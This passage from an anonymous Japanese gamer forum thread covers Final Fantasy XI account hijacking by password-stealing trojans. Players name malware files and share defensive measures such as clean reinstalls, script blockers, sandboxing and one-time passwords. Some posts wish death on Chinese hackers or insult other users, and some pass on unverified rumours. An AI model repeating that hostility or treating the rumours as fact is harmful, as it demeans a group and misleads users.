捕まっても失うものがない中華は平気で手を出すし、ネット上でなら尚更だな
>>714
当然、抹消専用ソフトでHDDを完全消去してからOSをクリーンインストールして
Windows Update後にクライアントを公式から落とし直して入れ直したんだよな?
717既にその名前は使われています:2008/08/18(月) 20:52:14 ID:8bWRsi68
>>692
それ俺もなったな。
すでにハッキングを受けていたのか・・・

こういうの苦手だから単純にPCが不安定になったんだと思っていたわorz
718既にその名前は使われています:2008/08/18(月) 21:05:38 ID:xV87syxr
何かみんなと症状違うな・・。シャットダウンにも時間かからなかったし
症状自体でなかった。ずっと放置してあったPCキャラ覗いたら急にハックされた感じ・・。
>>716
クリーンインストールはしてない、オンライン&自分のソフトでウィルスは感知されなかった
719既にその名前は使われています:2008/08/18(月) 21:06:34 ID:CoGNK0ec
>>712
火狐とNoscript
 
      ↑
こんなもん普通の奴は入れてねーよ
俺は入れてるけどな。アンチウイルス、最新Fプレイヤー、FWでもIEで踏んじまったら感染するからどうしようもねぇ
720既にその名前は使われています:2008/08/18(月) 21:50:38 ID:c7OprUPA
>>711
そのとおりですね、わたしの書き方が間違ってましたm(_ _)m

ちなみにUnleakだと、レジストリに干渉することを実行ファイルごとに
許可登録ができますから、それほど頻繁に問い合わせがくることはないと
思いますが、わたし自身がFFは別PCでそっちにUnleakを入れていないので
そのうち試してみようと思います
721既にその名前は使われています:2008/08/18(月) 21:56:52 ID:zzLuCatQ
ワンケアかカスペ導入しようと思うのですが
どっちも同じ様なものですか?
722既にその名前は使われています:2008/08/18(月) 22:02:15 ID:dFbgkzOG
>>718
一度潜伏されたらアンチウィルスじゃ検知できなくなるタイプもいるんだけんども
723既にその名前は使われています:2008/08/18(月) 22:15:59 ID:xV87syxr
>>722
知らなかった・・。ありがとうm(_ _)mクリーンインストールしてきます!
724既にその名前は使われています:2008/08/18(月) 22:32:13 ID:c7OprUPA
>>721
90日試用版の出てるワンケアおすすめかな
そのあとカスペルスキーの試用版に変えてみていいほう(自分の環境とか
使い勝手で)を選べばおっけじゃないですか?
725既にその名前は使われています:2008/08/18(月) 22:34:57 ID:qt+dXOwM
KarnaeghDrv.dllの前兆症状って切り分けできてたっけ?
シャットダウン云々はwzcsvbxm.dllでは発生してたけども。
726既にその名前は使われています:2008/08/18(月) 22:37:32 ID:c7OprUPA
>>725
KarnaeghDrv.dllに関しては、前兆症状の報告はありませんでした
いまでも気をつけて見てますが、テンプレを作るだけの症状報告は
来ていません
727既にその名前は使われています:2008/08/18(月) 22:49:12 ID:vec6Yysd
>>719
Firefox+NoScriptはブラウザセキュリティの基本だが…

まあIEでも、「インターネットゾーン」を高、「信頼済みサイト」を中高に設定して
スクリプトやActiveXが必要なサイトを「信頼済みサイト」に登録する手が使える
しかしこの方法だと、スクリプトやActiveXコンテンツの置かれたドメインと
アドレスバーのURLのドメインが異なることも多いから、サイト登録が面倒なんだよな
728既にその名前は使われています:2008/08/18(月) 23:06:05 ID:nQkfbSm6
なんか急にインできなくなったんだけど。
垢ハックされた時って、プレイオンラインIDが違うとか表示される?;;
729既にその名前は使われています:2008/08/18(月) 23:09:11 ID:wee1r1p+
>>728
びんご
730既にその名前は使われています:2008/08/18(月) 23:10:18 ID:bwCOGLhh
プレイオンラインID
またはプレイオンラインパスワードが
違います。

ってなる。
731既にその名前は使われています:2008/08/18(月) 23:11:05 ID:HFFiyTj5
>>730
残念ながらアウアウです。
732既にその名前は使われています:2008/08/18(月) 23:12:44 ID:nQkfbSm6
当たり前だが、PC再起動してもインできないお;;
733既にその名前は使われています:2008/08/18(月) 23:17:50 ID:bwCOGLhh
俺じゃないです・・・

まぁ俺も気が進まなくてIE系使ってるから危ういんだが。
734既にその名前は使われています:2008/08/18(月) 23:18:36 ID:nQkfbSm6
サポート時間外とかふざけんなwwwwww
735既にその名前は使われています:2008/08/18(月) 23:26:50 ID:I3ikc6UV
金曜の夜にハックされたらどうなるんだ?
736既にその名前は使われています:2008/08/18(月) 23:27:27 ID:vec6Yysd
ゲームクリアできてよかったじゃないか
ついでにハードディスクもクリアしとけ
>>733
いくらIEがセキュリティホールの宝庫といえども
「高」設定で侵入される脆弱性は滅多にないぞ
つーかIEコンポ使用ブラウザは何やってるか分からんから生IEより信用できん
737既にその名前は使われています:2008/08/18(月) 23:29:06 ID:dFbgkzOG
とりあえず別垢かFF以外で連絡取れるフレでもいたら
GM呼んでもらって垢凍結してもらいなされ

明日からサポチャリトライオンライン頑張れ
738既にその名前は使われています:2008/08/18(月) 23:29:20 ID:TFtacCiZ
>>735
知り合い通してGMに停止してもらうか
月曜にチャットボードから連絡。
ちなみに2日放置すると業者に釣りマクロ、箱開け、mobマクロされる
739既にその名前は使われています:2008/08/18(月) 23:31:18 ID:I3ikc6UV
>>738
要項によると本人でないと無理っぽいけど
740既にその名前は使われています:2008/08/18(月) 23:32:14 ID:2BkAeX9r
本人じゃなくても停止だけならしてくれるよ
741既にその名前は使われています:2008/08/18(月) 23:34:04 ID:nQkfbSm6
業者むかつく;;
マジで目の前に居たらぶん殴りたい;;
742既にその名前は使われています:2008/08/18(月) 23:34:29 ID:bwCOGLhh
そりゃ他人の要請でいきなり凍結されたらたまらんわw

嫌いなアイツをトウケッツー
743既にその名前は使われています:2008/08/18(月) 23:35:28 ID:dFbgkzOG
>>735
月曜までサポートチャット待ち

6月上旬、XREA広告の罠経由のデータが業者に行き渡った最初の金曜日 6月13日以来
金曜夜〜日曜はスーパー垢ハックタイムとしてく恐れられておる
最近はGMもサポセンも繋がらないのを知って平日でも変わらんくなったけどねー
744既にその名前は使われています:2008/08/18(月) 23:36:53 ID:Kte3YJDG
あああああああああああああああああああああ
745既にその名前は使われています:2008/08/18(月) 23:39:55 ID:5tDS9ige
まだ垢ハック下火にならないか・・・・
746既にその名前は使われています:2008/08/18(月) 23:41:38 ID:dFbgkzOG
>>742
それがあるから本人確認に必要な情報なり
そう判断に足る充分な条件が揃わないと止めてはくれないはず

でも今までも第三者経由で止めてもらった報告は山ほどあるよ

コール者経由でGMからいくつか質問して確認したり
LSのBBSにSOSカキコあって管理者がIPから本人の書き込みと確認→アカ凍結
なんて報告もあったはず
747既にその名前は使われています:2008/08/18(月) 23:44:59 ID:uUMMZDil
どこで聞けばいいのかよくわからんのですが
削除不能 TSPY_ONLINEG.QBP Trojan C:\WINDOWS\system32\apsghjba.dll
オンラインウィルスチェックしたらこれ出てきたんですけどヤバイですか?
PCの知識が無さ過ぎてどうすればいいのやら。
748既にその名前は使われています:2008/08/18(月) 23:50:40 ID:5tDS9ige
いまだにpolについてのシステム強化をしていないのか。クズエニは
亜種がたくさんでてるし、対応しきれないからあきらめてるのか?w
749既にその名前は使われています:2008/08/18(月) 23:52:37 ID:nQkfbSm6
ウイルスが検出されました!
ファイル名: KcrnaeghDrv.dll
ウイルスの説明: Win32:Rootkit-gen [Rtk]

こんなの出た・・・やだ・・・なにこれ・・
750既にその名前は使われています:2008/08/18(月) 23:53:23 ID:PHsjYJFY
>>747
ネーミングがバスターくさいな
全くわからないならリカバリ
751既にその名前は使われています:2008/08/18(月) 23:54:14 ID:PHsjYJFY
>>749
XREAで投下されるアカハック。rootkit込み。
752既にその名前は使われています:2008/08/18(月) 23:55:49 ID:HFFiyTj5
>>749
どう見てもアウアウです。
駆除に自信がないならクリーンインスコ推奨れす。
>>747
それもオンゲのウイルスですな。FFに対応してるかどうかまでは分からないけど
怖いなら同じくクリーンインスコ後にセキュリティ強化推奨
753既にその名前は使われています:2008/08/18(月) 23:58:56 ID:qK+CzJJn
Sandboxieすごくね?
Webブラウザにコンドーム被せたくらいの安心感w
おおっぴらにはまだオススメできないけど、すげー強固なセキュリティになりそうだから もうちょっと使い倒してみる。
754既にその名前は使われています:2008/08/19(火) 00:00:12 ID:cWc4sS4M
>>747
マカフィのページがたくさんヒットしました

マカフィ
ttp://www.mcafee.com/japan/security/virPQ2007.asp?v=PWS-OnlineGames.a

このあたりのものだと思われます
755既にその名前は使われています:2008/08/19(火) 00:00:43 ID:XZaGZzSX
どうしよう・・LSの人に迷惑かかってなきゃいいけど・・。
マジで業者野放しだったのかよ、スクエニはあああああああああああああああ
756既にその名前は使われています:2008/08/19(火) 00:00:54 ID:KZn6yQAP
>>747
750もいってるように バスタの名称ぽいけど
バスタで検出されたならメイン画面から ウィルスデータベースに接続して詳細画確認できるんじゃないでしょうか
もしくは 「TSPY_ONLINEG.QBP」で検索してみましょう
>PCの知識が無さ過ぎてどうすればいいのやら。
は なんの免罪符にもなりませんよ。
757既にその名前は使われています:2008/08/19(火) 00:03:05 ID:cWc4sS4M
マカフィ情報では↓

概要
・PWS-OnlineGames.aはLineage、LegMir、World of Warcraft、Rohanといった
 オンラインゲームのアカウントを盗み出すトロイの木馬です。

だそうです
758既にその名前は使われています:2008/08/19(火) 00:06:04 ID:teIsHZGI
>>747
ttp://www.trendmicro.co.jp/vinfo/grayware/ve_graywareDetails.asp?GNAME=TSPY%5FONLINEG%2EQBP
参照。
単一のダウンローダから1.gif〜?.gif連番で実行、
そのうち26.gifを引っ掛けたものかと。数十匹いるものと思われ。
個別のセキュリティソフトの操作方法についてはセキュリティ板でどぞ。
759既にその名前は使われています:2008/08/19(火) 00:07:07 ID:bJQ/qQZx
どんなにセキュア強化してもIE使ってる限り感染しますよ
760既にその名前は使われています:2008/08/19(火) 00:11:32 ID:XZaGZzSX
火狐+avast!でやられました・・
761既にその名前は使われています:2008/08/19(火) 00:13:05 ID:1lEQFvWG
>>760
その火狐にはNoscriptは入っていたのかね
ついでにFlashplayerのバージョンは・・・と色々突っ込み所はあるのだけんども

とりあえず>>6埋める形で現状を整理してみなされ

762既にその名前は使われています:2008/08/19(火) 00:13:15 ID:cWc4sS4M
>>759
設定次第ですよ
763既にその名前は使われています:2008/08/19(火) 00:14:34 ID:teIsHZGI
>>759
んなこたないよ。
・利用者が圧倒的に多い
・大量のActiveXコントロールがOSコンポーネントとしてデフォルトで存在しているので
 イタズラしやすい(実例:chm、MDAC、VML)
から狙われやすいだけで。
きっちり脆弱性を塞いでいれば平気だし、
ゼロデイ食らったらIEもFxもやられることに変わりはないし、
FlashPlayerのようにIEとFx両方に存在する物の場合も変わりはない。
764560:2008/08/19(火) 00:26:13 ID:Eq5y1JjV
俺一人で検証してもあまり説得力ないから、気が向いたら試してみてくれよ
本当にコンドーム級の安心感なんだ・・・

ネットワークセキュリティ板より
ttp://pc11.2ch.net/test/read.cgi/sec/1178731848/l50

1 :名無しさん@お腹いっぱい。:2007/05/10(木) 02:30:48
これはちょっといいかも。
SandboxieではWindows上にいわゆる「テスト環境」を作ってくれる。
このプログラムを起動した上でテストしたいプログラムを動かした場合、あなたのハードディスクに一切データを書き込むことなく動作確認ができるのだ。
なんだか怪しいなぁ、というプログラムや、ちょっと試してみたいだけ、というプログラムに威力を発揮するだろう。
またそうして試したプログラムは、Sandboxie上で削除するだけできれいさっぱり消えてくれるという簡単さである。
ネットの普及によって何が怪しいかがわかりにくくなっている。こうした「テスト環境」を提供してくれるソフトウェアはいいですね。

ttp://www.100shiki.com/archives/2007/05/windowssandboxie.html

ttp://www.sandboxie.com/
765既にその名前は使われています:2008/08/19(火) 00:27:28 ID:teIsHZGI
名前…
766既にその名前は使われています:2008/08/19(火) 00:27:46 ID:Eq5y1JjV
いまSandboxieからギコナビ起動して書き込み中
560は気にしないでくれw
767既にその名前は使われています:2008/08/19(火) 00:28:14 ID:teIsHZGI
あっちの560は見なかったことにするw
768既にその名前は使われています:2008/08/19(火) 00:35:20 ID:Z09pNZxS
>>725
前兆というと、信長オンラインではクライアント落ちが多発してた、ってことかな
POLやリネも対象になってるみたいだけど、信長でしか影響が確認できてないんだと思う
769既にその名前は使われています:2008/08/19(火) 02:32:04 ID:p5T0Z+DU
>>728
ついこないだの俺がいる。

サポセンに電話してパス再発行してもらってインしてみたら
鯖移転させられてて名前も変わってて流砂洞で金策させられてたぜw

もうネタにするしかねーよw
770既にその名前は使われています:2008/08/19(火) 02:47:09 ID:BOiTm1IE
>>764
砂箱の中でもSandboxieは結構良い評価もらってるソフトだねー。個人的には仮想環境でブラウズするよりはお手軽だとは思うよ。
ただし、問題が起きた時に自己対処できるくらいでないとちょっとお勧めはしないかなー。なんだかんだで色々面倒なところもあるし。

それと、きっちりFWやらHIPSやらAnti-Virusやらしっかり対策した上でやらないと予想外のところから一杯食わされたりするから注意なw
771既にその名前は使われています:2008/08/19(火) 02:59:17 ID:nTDoDOuK
>>769
名前もかわってるって(鯖移転の手続きだろうけれど)辛すぎる…
772既にその名前は使われています:2008/08/19(火) 03:13:12 ID:pSPsVu0V
PW変更の際、もうちょっとなんか聞いてくれたほうがいいよなぁ。
現状今の仕様だからこそ、2つのハードでやってる人はINしてる最中に垢ハックでINされた場合
すぐPW変えるなり、INするなりで運よかったら一時的には回避できるかもしれないけどもさ。

773既にその名前は使われています:2008/08/19(火) 03:25:04 ID:HprA3YvF
垢ハックされなくなるなら、ログイン自体がもっとややこしくなったっていいぐらいだよね。
774既にその名前は使われています:2008/08/19(火) 03:32:02 ID:RmoxGzvI
>>770
Sandboxieでブラウザを起動したからといって
JavaScript全開にしたりすると危険なんですよね?
便利そうだなと思ったけどヘルプが英語でよくわからなかった^^;
775既にその名前は使われています:2008/08/19(火) 03:37:59 ID:o2RjCGUy
本人にしかわからない質問(ママンの旧姓とか)を設定できるようにして
全く違うIPアドレス範囲からアクセスした場合は確認ダイアログがPOP UP。

これを実装するだけで垢ハックはほぼ防げるんだが>■e
776既にその名前は使われています:2008/08/19(火) 03:42:26 ID:HprA3YvF
今のログインやパス変更、変える気あんのかね?
思案中なり開発中なり、手がけてんなら何か示してほしい。
777既にその名前は使われています:2008/08/19(火) 03:55:37 ID:1hOqTqRa
中国人はそれで生きてるんだからハックされてやれ
778既にその名前は使われています:2008/08/19(火) 04:02:05 ID:HMd3aFJK
>>777

ハックする中国人なんて死んだほうが世界のためになる^;
779既にその名前は使われています:2008/08/19(火) 04:04:10 ID:bJQ/qQZx
生きてるというか荒稼ぎしてんだよ
円は中国の元の10倍の価値があるしな

今1元15円ぐらい
http://www2.odn.ne.jp/ccw94440/braidal/page045.html

中国のサラリーマンの平均月収が日本円で15000円〜30000円だからRMTでギルを10万売ると・・・・あとはわかるな?
780既にその名前は使われています:2008/08/19(火) 04:06:01 ID:WkTA7QsW
そして大事な円が流出しても
リアルマネー使ってRMTしてるのは日本人なんだよな。
本当に何考えてるんだといいたい
781既にその名前は使われています:2008/08/19(火) 04:12:22 ID:9sXJO7M8
ubuntuとのデュアルブートにして、
ネット閲覧をubuntuでするのが手っ取り早くね?
火狐3もつかえるし、2chブラウザもあるよ。
782既にその名前は使われています:2008/08/19(火) 04:36:57 ID:c4vbCmYc
>>781
いや、案外再起動の手間ってめんどくさいものよ。それにデュアルブートの仕組み関連でトラブルが
起きた場合、詳しくない人の場合、両OSをまっさらから入れなおすしか出来ないことも有ろう。
Linux側からNTFSを操作するのも多少めんどいし。
だったら仮想環境とかの方が色々お手軽でいいんじゃないかと思うよ。仮想化したHDDイメージとか
とっておけばどこでもすぐに仮想環境を設置できるからね。

Sandboxieは私も使っているけど、仮想PC上で動かしているな。念を入れ過ぎかもしれないけど、
ウイルス検証等はこれぐらいしないと怖いからなー。
783既にその名前は使われています:2008/08/19(火) 04:38:51 ID:aVGKaRBf
>>776
普通に考えれば「ない」だろ
だって、すでにハックされてるかもしれないのに今から変えても無意味すぎる
やるなら全PCに本人確認しなきゃいけないわけで

まあ、そうなったらムーミン谷在住の人や垢買いは一気にアボーンだな
784既にその名前は使われています:2008/08/19(火) 04:43:41 ID:HprA3YvF
リネだかなんかは、すごい面倒なんじゃなかったっけ。
あれって最初からじゃないよね?
785既にその名前は使われています:2008/08/19(火) 05:26:58 ID:D0VnZyQ8
スレ違いすみません。今どき〜見失いどこにいるのか分からなく・・・
パソコン詳しい方多そうなので ここにカキコ失礼します・・・。今どきage頂けると幸いです
ウィンドウズXPでOCN使ってます。以前は(クリーンインストール以前は)
アプリケーションボタン押すとネットに繋がる設定だったのですが出来なくなってしまい
接続方法ご存知の方いれば教えて下さい。
786既にその名前は使われています:2008/08/19(火) 05:28:18 ID:AXHGkB9H
いつの時代であろうがどんなセキュリティくんでようがw
間抜けとしかおもわねぇぇぇぇlsいてたら弄る対象にはなるかもしれないがw
かわいそうなどと言う対象にはならねぇlwwwwwww

この暇な時代に話題提供してくれた程度にしかなwwwwwwwwwwww
垢ファックはっきりいおう 間抜けwwwwこれ以外に言葉はないからなw
ww3wwwwwwwwwwwwwwwww
787既にその名前は使われています:2008/08/19(火) 05:56:23 ID:Q0z2pw6M
それはごもっともだけどオレの考えは違った。
788既にその名前は使われています:2008/08/19(火) 06:13:37 ID:K/1q58QB
>>785です。
スレ違い失礼しました。あちらに書き直しましたm(_ _)m


789既にその名前は使われています:2008/08/19(火) 07:48:22 ID:iXG2J2yi
約1ヶ月と1週間で復旧完了しました。
ハックされる前日に半年かけてとったアイテムがあって、
復旧でハック3日くらいまえにもどったっぽくって
アイテムなくなってた><
アイテム救済措置とかで戻るかどうかわかります?
戻らなかったら引退しよう…
790既にその名前は使われています:2008/08/19(火) 07:55:16 ID:YExglfJ6
>>789
まずは半年かけて取ったアイテムが何なのか答えて貰おうか
791既にその名前は使われています:2008/08/19(火) 08:10:40 ID:UixUoUwh
789です。アイテムはサルベージ装備です(>_<)がんばったのにな。
792既にその名前は使われています:2008/08/19(火) 08:33:27 ID:AXHGkB9H
よぉーく考えてごらんw元にはもどらんwセーブポイントが3日前だったのよw
あきらめて引退するかwがんがってもう一度トライするかwお前しだいだw
793既にその名前は使われています:2008/08/19(火) 08:47:55 ID:UixUoUwh
まじですかぁ…。
前どっかで見たことあるんですけど捨てちゃったアイテム一回だけ戻してもらえるみたいなの。それとキャラの巻き戻しは一緒なんですかねぇ?
諦めきれないやー。
794既にその名前は使われています:2008/08/19(火) 08:58:49 ID:FrwCB4v4
サル装備なら預けてある状態に巻き戻るって事はないの?
795既にその名前は使われています:2008/08/19(火) 09:02:29 ID:diJvyF3J
ゲームデータの復元は、サーバーのバックアップデータをもとに、ゲームデータを不正アクセスに遭う前の状態に戻す措置です。

※いつの時点のゲームデータに戻すかを、あらかじめ特定することはできません。また、会員ご本人が希望する時点のゲームデータに戻すこともできません。

※復元に使用するバックアップデータの作成されたタイミングによっては、いくつかのアイテムが競売所に出品中、あるいは宅配で配送進行中となっている場合があります。その際、これらに該当するアイテムを復元することはできません。

※何らかの事情でサーバーにバックアップデータが存在しないなどの理由で、ゲームデータを復元できないことがあります。
796既にその名前は使われています:2008/08/19(火) 09:12:22 ID:w6SO7RbV
>>793
おまえまだ言ってんのw
797既にその名前は使われています:2008/08/19(火) 09:14:56 ID:rwRayN+k
>>781
>ネット閲覧をubuntuでするのが手っ取り早くね?
正直俺もそう思うね、Windows/openSUSEのデュアルブートで常用してるけど特段面倒だと思った事も無い。
Windowsのセットアップ時に予めパーティション切っておけば何の問題もなく導入できるし。

798既にその名前は使われています:2008/08/19(火) 09:23:38 ID:diJvyF3J
ブラウザ用としてUbuntu使うなら、デュアルブートするより
VirtualBoxかVMwareの仮想マシン使った方が手っ取り早いだろ
ttp://www.ubuntulinux.jp/news/ubuntu804-ja-vm
799既にその名前は使われています:2008/08/19(火) 09:39:55 ID:8+kZaTsa
手っ取り早いけどlinux初心者にはflashのインスコすら難しくて困るw
FFAHとネ実を見るだけならいいんだけどね
800既にその名前は使われています:2008/08/19(火) 10:50:43 ID:rhZr/eFk
さっそく紹介されたsandboxie入れて書き込み
設定デフォルトでいいんかね?
とりあえずここにはそのまま来れたんだがw
801既にその名前は使われています:2008/08/19(火) 11:03:00 ID:c9sTNsNc
データ復元されたんだが、
装備貸してるときにバックアップされたデータぽくて
返してもらった後にハックされたから貸してたアイテムがない。
競売や宅配に出してたわけじゃないから駄目元で聞いてみるか。
802既にその名前は使われています:2008/08/19(火) 11:14:56 ID:hLQAHGV0
質問(ノ><)ノ
ハック後 クリーンインストールする前に新たなパスで入っちゃったんですが
ハックってパス入力した際に抜けれますか?ウィルス起動してからですか?
今はクリーンインストール等完了してるのですが・・・。
もし入力でハックならサポセンでパス変更依頼したほうがいいでしょうか?
(現在はその新たなパスで入れる状態)
803既にその名前は使われています:2008/08/19(火) 11:19:45 ID:ehIRtwW/
>>802
日本語でおk
804既にその名前は使われています:2008/08/19(火) 11:21:23 ID:w6SO7RbV
このスレで散々クリンインスコしてからって言われてるのに何も伝わってねえ
802みたいな人の世話もしなきゃならんとはサポセンの人も大変だな
805既にその名前は使われています:2008/08/19(火) 11:22:06 ID:FHD3vhmV
抜かれている可能性大だな
なんでウイルス感染しているPCでログインするかな
806既にその名前は使われています:2008/08/19(火) 11:23:58 ID:hLQAHGV0
やっちゃったね(´〜`;)
807既にその名前は使われています:2008/08/19(火) 11:23:59 ID:HYYSb48W
>>802
FF引退おめでとう
808既にその名前は使われています:2008/08/19(火) 11:25:45 ID:ehIRtwW/
詐欺に会う人は何度でもあう
心に隙がある
809既にその名前は使われています:2008/08/19(火) 11:27:33 ID:a38mWj4T
新しくHDD買ってOS入れてFF11以外やるな
webもメールもすんな
FF11プレイ終わったらPCからHDD外せ
プレイしたければ繋ぎ直せ
810既にその名前は使われています:2008/08/19(火) 11:30:23 ID:FHD3vhmV
新品のHDDも感染していたとか情報があるんで、
新品買ってもウイルスチェック終わるまでOSインスコすんなよ
811既にその名前は使われています:2008/08/19(火) 11:31:13 ID:rhZr/eFk
パス抜かれたときと同じ状態で入ったんだからパスは抜かれている
すぐにパス変えろ
今はパスとか抜かれて業者の処理待ちの段階だと思っていい
812既にその名前は使われています:2008/08/19(火) 11:34:30 ID:4OXTUQPv
>>779
罠サイトが置かれてる成都あたりは、平均手取り年収で5万円以下だしな・・
813既にその名前は使われています:2008/08/19(火) 11:53:13 ID:hLQAHGV0
【ただいま】パス変えてもらってきました。
あんまりインターネットしてなくて、友達に聞いた情報でやってました。
ここでクリーンインストールの重要性知って 慌てて聞いてみたんです・・
間に合ってよかったです・・。
814既にその名前は使われています:2008/08/19(火) 11:57:25 ID:oJNfV2s1
>>804
知り合いがサポセンにいるが、こういう人多いらしいよ…
ここ見て後手後手でも対策してる人はまだマシだってさ。

個人的にログインが面倒になっても、パスワ変更が面倒になっても
セキュリティが向上されてデータが守られるなら、
追加費用がかかろうがワンタイムパスワードになってもいい。
でも、大半のPS2ユーザーは「めんどくせえ」
「アカハックされる間抜けなPCユーザのせいでこんな糞仕様」って言いそう。
815既にその名前は使われています:2008/08/19(火) 12:02:07 ID:FHD3vhmV
セキュリティーソフト入れているからパス抜かれるなんてありえないと思っている人多そうだ
816既にその名前は使われています:2008/08/19(火) 12:02:54 ID:Jg6eh6i2
ウィルスセキュリティ0とか使ってるヤツに、そういうのが多そうだ。
817既にその名前は使われています:2008/08/19(火) 12:03:33 ID:hLQAHGV0
一回コッキリのパスにしたらいいかもw
毎回モーグリが教えてくれたりo(^-^)o
818既にその名前は使われています:2008/08/19(火) 12:07:34 ID:FHD3vhmV
>>817
PCフリーズしたら終わりだなw
819既にその名前は使われています:2008/08/19(火) 12:11:46 ID:hLQAHGV0
>>818
( ̄▽ ̄;)
820既にその名前は使われています:2008/08/19(火) 12:14:13 ID:03EDDn0n
>>819
(´〜`;)
821既にその名前は使われています:2008/08/19(火) 12:23:50 ID:w6SO7RbV
>>817
おまえ反省してねーだろ
サポセンのネーチャンに迷惑かけたってわかってるのか
822既にその名前は使われています:2008/08/19(火) 12:26:37 ID:hLQAHGV0
反省してるよ・・。
おにーちゃんだったし( ^^)Y☆Y(^^ )
ただ、知識なかったらどーにもなんないんだよね、
ここ来てよかった
823既にその名前は使われています:2008/08/19(火) 12:27:07 ID:hASSugUD
>>812
一ヶ月で年収稼げるのか
ウラヤマシス
824既にその名前は使われています:2008/08/19(火) 12:27:57 ID:hLQAHGV0
あ、チャットだから性別わかんないや( ̄▽ ̄;)
825既にその名前は使われています:2008/08/19(火) 12:29:12 ID:Yz2oiYGu
>>824
少なくともその顔文字が反省してるように見えねーわ
失せろチンカス
826既にその名前は使われています:2008/08/19(火) 12:34:00 ID:hLQAHGV0
アドバイスありがとうございましたm(_ _)m
827既にその名前は使われています:2008/08/19(火) 12:41:05 ID:bcm4OQCT
FFXIはソフト自体もパッケージ販売で有料なんだから、
トークン使ったワンタイムパスワードを導入してもよさそうだよな

銀行サイトだと、ウイルスが振込内容を改竄する場合があるから万全ではないが、
オンラインゲームなら、多重ログイン対応をしっかりやれば効果高いと思うし、
IDをトークンに書くような馬鹿以外は、物理的に盗難されても不正利用されないしな
828既にその名前は使われています:2008/08/19(火) 12:43:41 ID:FHD3vhmV
トークン化は是非導入してもらいたいな
今の状態だとPS2か箱○かFF専用PC作らないと恐くて出来ない
829既にその名前は使われています:2008/08/19(火) 12:45:01 ID:oIAuyJBd
みんな大変だな
830既にその名前は使われています:2008/08/19(火) 12:59:43 ID:SOAjzLX+
ちょっと質問、というか意見が聞きたいだけなんだけど
もし>>802みたいに放置したまま復旧して
パスを抜かれてた場合
凍結解除された瞬間入られるもんだと思う?
831既にその名前は使われています:2008/08/19(火) 13:02:50 ID:1luvE/ek
チンカスに失礼だろうが
832既にその名前は使われています:2008/08/19(火) 13:04:07 ID:SOAjzLX+
ごめんチンカス
ちょっと気になっただけなんだ
833既にその名前は使われています:2008/08/19(火) 14:22:54 ID:jDVcj3Uj
あまりPCに詳しく無いフレから相談を受けた内容なんだがちょっと意見を聞かせて欲しい。

1:フレのLSメンバーが立て続けに垢ハックを食らった。
2:LSのホームページからリンクしてる場所のどこかから集団感染?。
3:垢ハックされた人はゲーム中にエラーで落ちることが多かった。

1−2番はいいんだけど、気になったのが3番の部分。
起動時では無くモグハウスに入った時にエラーが出ていたらしい。
この部分が垢ハックの要因になっている可能性があるのかどうか
調べたいんで以下の2点について心当たりのある人が居たら教えて欲しい。

@同じ現象が出た後に垢ハックを食らった(人が居る)
A外部ツールにより同じような問題が出る

エラー発生のタイミングがパスワードを使用する部分と違うからAの可能性があるんだけど
外部ツールのこと詳しく無いんでアドバイス出来ないんだよね。情報求む
834既にその名前は使われています:2008/08/19(火) 14:27:59 ID:teIsHZGI
2かなぁ。
アカウントハックトロイとしては「FFXIの」じゃなくて
「PlayOnlineの」アカウントを盗るんだから
何かおかしな挙動が出るとすればPOLViewer。
FFXIについては起動・終了を含めて関知する必要がない(何もしない)。
835既にその名前は使われています:2008/08/19(火) 14:30:46 ID:ehIRtwW/
ついにオカルト板になった!
836既にその名前は使われています:2008/08/19(火) 14:33:18 ID:sPhXq6u7
スキャンはしたの?
ハックされてるとPCは不安定らしいぜ?
外部ツールではないと思うが、RMTしてたかも?
837833:2008/08/19(火) 14:34:14 ID:jDVcj3Uj
>834
自分もそう思ってるんだけど同じ現象が複数人で確認されているらしいのよ。
外部ツールでその現象(エリア移動か?)が出るのならツーラー乙と言えるんだけどね。
無いとは思うが新型の時のことを考えて状況をもう少し確認しようと思ってる。

>835
PCにあまり詳しく無い人はこんなもんだよ・・・
問題箇所の予測と切り分けをするのが難しい。
838既にその名前は使われています:2008/08/19(火) 14:34:24 ID:teIsHZGI
ROの首無しBOTかよw
839既にその名前は使われています:2008/08/19(火) 14:35:24 ID:UJxsht4b
>>830
可能性はあるんじゃね。
もしかしたら俺もどっかのタイミングで抜かれてるかもしれない。
課金切れでログイン不可能にして対処するが……まさか業者が勝手に課金することもあるまい。

>>833
8月頭にハック食らった。重くなるとかの前兆は見られなかったけど、
白門でBGMが飛んだりリピートしたりすることがあった。関係なかったらごめんねごめんね
840既にその名前は使われています:2008/08/19(火) 14:38:27 ID:teIsHZGI
>>837
ゲームによってはキャラ選択でパス入力・倉庫(金庫)でパス入力といったように
ゲームクライアント上でも認証するけど、
FFXIはそういうの一切なくてPOLにおんぶにだっこだから
純粋なパス抜きの動作としてはありえないと思うよ。
罠ツールに仕込まれたとかならあるかもしれんが
ツール探し回って解析する気にはなれない。
841既にその名前は使われています:2008/08/19(火) 14:38:58 ID:FHD3vhmV
とりあえず応急処置としては課金とめる為にコンテンツの解約をすれば
支払いクレカにしてても大丈夫かな
業者がコンテンツの復活をしたなんて聞いたことがないし
842既にその名前は使われています:2008/08/19(火) 14:42:25 ID:9U6n/Yix
コンテンツ解約のみでPOLは解約してなかったら
元キャラ復活された上に新規倉庫作られてたって報告あったよーな
843既にその名前は使われています:2008/08/19(火) 14:48:41 ID:oJNfV2s1
鯖移動の手順を分かってるし、復活もできそう
844既にその名前は使われています:2008/08/19(火) 14:56:09 ID:jDVcj3Uj
再現性があり頻発するエラーってのが気にかかるところ。
通常は発生しないものだからFFのゲーム自体になんらかの外的負荷がかかってると思うのよね。
それがマルウェアによるものなのかアドバンテージwなツールによるものなのか。
たとえば・・・・

・POL干渉タイプだが以前のように初回エラーで落ちず、フックしたまま常駐
・起動時以外のPOLのなんらかの動作時にパスワードを送出する
・それがモグハウス等のエリアチェンジ時
 エリチェン時ってPOLメッセージの更新のためにPOLのタスクが動いて無かったっけ?
・白門BGMが抜けるのはエリチェン後のエリア負荷が高い場所に移動したときに
 上記負荷により音楽などの読み込みが間に合わない場合に発生していた

ここまで来たら言いがかり&取り越し苦労だとは思うけどねw
でも>>839の話を含め、こんな可能性もゼロでは無いと思ってる。
845既にその名前は使われています:2008/08/19(火) 14:59:01 ID:VhXkvU+q
高価な装備をしている可能性があれば復活させてでも持っていくだろうね。
キャラ売ればそんな金額屁とも思わんだろうし。
846既にその名前は使われています:2008/08/19(火) 15:05:58 ID:XZaGZzSX
垢ハックくらって、インできなくなったんだけど、
感染したファイルは消したんだけど、やっぱり再インスコした方がいいの?
もしかしてPC初期化もした方がいいとか?
なんかめんどくさくなって引退でもしたいけど、
インすら出来ないから解約手続きもできない;;
